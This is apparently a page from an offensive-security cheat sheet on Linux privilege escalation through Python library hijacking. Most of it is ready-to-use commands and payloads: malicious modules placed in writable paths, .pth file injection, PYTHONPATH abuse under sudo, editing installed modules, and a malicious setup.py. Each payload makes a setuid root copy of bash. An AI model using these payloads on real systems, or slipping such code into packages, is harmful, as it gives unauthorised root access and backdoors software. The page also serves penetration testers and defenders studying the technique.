Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

If a script runs as root and imports a Python module, you can hijack that import by placing a malicious module earlier in the search path.

Python Module Search Order

1. Current directory of the script
2. PYTHONPATH environment variable
3. Default installation paths (/usr/lib/python3/dist-packages, etc.)
Check search path: 
python3 -c 'import sys; print("\n".join(sys.path))'

Find Target Scripts

Scripts Running as Root

# pspy
./pspy64 | grep python

# crontab
cat /etc/crontab | grep python
crontab -l | grep python

# systemd
grep -r "python" /etc/systemd/system/ 2>/dev/null

Check Imports

cat /opt/script.py | grep import

Same Directory Hijack

If root script at /opt/script.py imports utils: 
# /opt/script.py
import utils
utils.backup()
And /opt/ is writable: 
ls -la /opt/
Create malicious module: 
# /opt/utils.py
import os
os.system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash")
Wait for execution → /tmp/rootbash -p.

Writable Library Path

Check if any directory in Python path is writable: 
python3 -c 'import sys; print("\n".join(sys.path))' | while read p; do [ -w "$p" ] && echo "WRITABLE: $p"; done

find /usr/lib/python3* -writable -type d 2>/dev/null
find /usr/local/lib/python3* -writable -type d 2>/dev/null
If writable → drop malicious module with same name as imported module: 
echo 'import os; os.system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash")' > /usr/lib/python3/dist-packages/target_module.py

PYTHONPATH Injection

If sudo preserves PYTHONPATH: 
sudo -l
# (root) NOPASSWD: /usr/bin/python3 /opt/script.py
# env_keep+=PYTHONPATH
Create hijack module: 
# /tmp/hijack/importedmodule.py
import os
os.system("/bin/bash")

sudo PYTHONPATH=/tmp/hijack /usr/bin/python3 /opt/script.py

Writable .py File (Direct Edit)

If the imported module itself is writable: 
ls -la /usr/lib/python3/dist-packages/used_module.py
Inject at the top: 
echo -e 'import os\nos.system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash")\n' | cat - /usr/lib/python3/dist-packages/used_module.py > /tmp/mod.py && mv /tmp/mod.py /usr/lib/python3/dist-packages/used_module.py

.pth File Injection

.pth files in site-packages directories add paths to sys.path. Lines starting with import are executed. Check if writable: 
find /usr/lib/python3* -name "*.pth" -writable 2>/dev/null
ls -la /usr/lib/python3/dist-packages/*.pth
If writable dir exists, create: 
echo 'import os; os.system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash")' > /usr/lib/python3/dist-packages/evil.pth
Executes on any Python invocation.

pip Install Hijack

If user can run pip install as root or root runs pip automatically:

Malicious setup.py

from setuptools import setup
import os

os.system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash")

setup(
    name="legit-package",
    version="1.0",
)

sudo pip install .

Quick Reference

ScenarioTechnique
Script directory writableDrop module in same dir
Python lib path writableDrop module in lib path
PYTHONPATH preserved in sudoSet PYTHONPATH to hijack dir
.pth file writableInject import os; os.system(...)
pip as rootMalicious setup.py